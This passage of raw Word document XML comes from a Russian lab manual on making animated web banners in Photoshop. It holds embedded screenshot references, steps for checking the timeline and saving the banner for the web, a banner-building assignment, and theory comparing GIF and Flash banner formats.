                      <a:ext cx="3213137" cy="540679"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1161750" cy="342104"/>
            <wp:effectExtent l="19050" t="0" r="300" b="0"/>
            <wp:docPr id="787" name="Рисунок 787" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image043.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId489" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1162643" cy="342367"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3112950" cy="396093"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="788" name="Рисунок 788" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image044.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId490" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="3113193" cy="396124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B012EC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1694550" cy="947474"/>
            <wp:effectExtent l="19050" t="0" r="900" b="0"/>
            <wp:docPr id="789" name="Рисунок 789" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image045.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId491" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1698395" cy="949624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2796150" cy="387018"/>
            <wp:effectExtent l="19050" t="0" r="4200" b="0"/>
            <wp:docPr id="790" name="Рисунок 790" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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http://ok-t.ru/studopedia/baza14/71156389034.files/image046.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId492" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2798522" cy="387346"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B012EC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1484630" cy="410845"/>
            <wp:effectExtent l="19050" t="0" r="1270" b="0"/>
            <wp:docPr id="791" name="Рисунок 791" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image047.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId493" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1484630" cy="410845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2292150" cy="362321"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="792" name="Рисунок 792" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/im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http://ok-t.ru/studopedia/baza14/71156389034.files/image048.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId494" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2306853" cy="364645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B012EC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3307350" cy="298437"/>
            <wp:effectExtent l="19050" t="0" r="7350" b="0"/>
            <wp:docPr id="793" name="Рисунок 793" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image049.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId495" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3307118" cy="298416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 11.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ваша </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Временная шкала</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TimelineAnimation), должна выглядеть примерно так, как ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2040150" cy="1572950"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="794" name="Рисунок 794" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image050.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId496" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2042609" cy="1574846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(нажмите на изображение, чтобы увеличить)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 12.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажмите кнопку Пуск (Play), чтобы увидеть результат. Вы можете вс</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> подстроить в случае необходимости. Чтобы сохранить ваш баннер, перейдите в меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Файл - Сохранить для веб и устройств</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (File - SaveforWeb&amp;Devices). Установите настройки как на скриншоте ниже и нажмите кнопку Сохранить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1425600" cy="1364444"/>
            <wp:effectExtent l="19050" t="0" r="3150" b="0"/>
            <wp:docPr id="67" name="Рисунок 795" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/im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http://ok-t.ru/studopedia/baza14/71156389034.files/image051.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId497" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1427334" cy="1366104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="909847" cy="1908000"/>
            <wp:effectExtent l="19050" t="0" r="4553" b="0"/>
            <wp:docPr id="93" name="Рисунок 796" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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http://ok-t.ru/studopedia/baza14/71156389034.files/image052.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId498" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm flipH="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="911124" cy="1910678"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Согласно методическим указаниям в теоретической части, необходимо проработать подготовленные эскизы баннера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Согласно методическим указаниям в теоретической части, необходимо проработать подготовленные на практическом занятии №4 эскизы баннера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. После проработки необходимо собрать электронный баннер из готовых частей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Современный интернет с его многообразием сайтов и сервисов совершенно немыслим без баннеров. Они есть практически на каждом сайте: от серьезного портала до домашней странички. Мигающие и статичные, большие и маленькие – мир баннерной рекламы не стоит на месте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Одним из самых важных критериев, по которым баннеры отличаются друг от друга является технология изготовления, где два самых распространенных формата – gif и flash постоянно соревнуются в первенстве.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы понять, на чем основано состязание, необходимо заглянуть немного глубже и посмотреть, что технологически представляют собой оба эти формата:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gif (аббревиатура от английского </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GraphicsInterchangeFormat</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - обмен или хранение графических изображений).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фактически gif-баннер - это архив, хранящий несколько сжатых изображений одновременно и воспроизводящий их в заранее установленном порядке кадр за кадром, создавая эффект анимации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изображение в gif-формате может быть выполнено только в стандартной палитре из 256 цветов, причем один из цветов можно задать прозрачным, что позволяет делать баннеры, адаптированные под фон сайта, на котором они показываются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Flash-баннеры. Так называются изображения, выполненные в </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MacromediaFlash</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - мощном редакторе для создания анимации с использованием элементов программирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
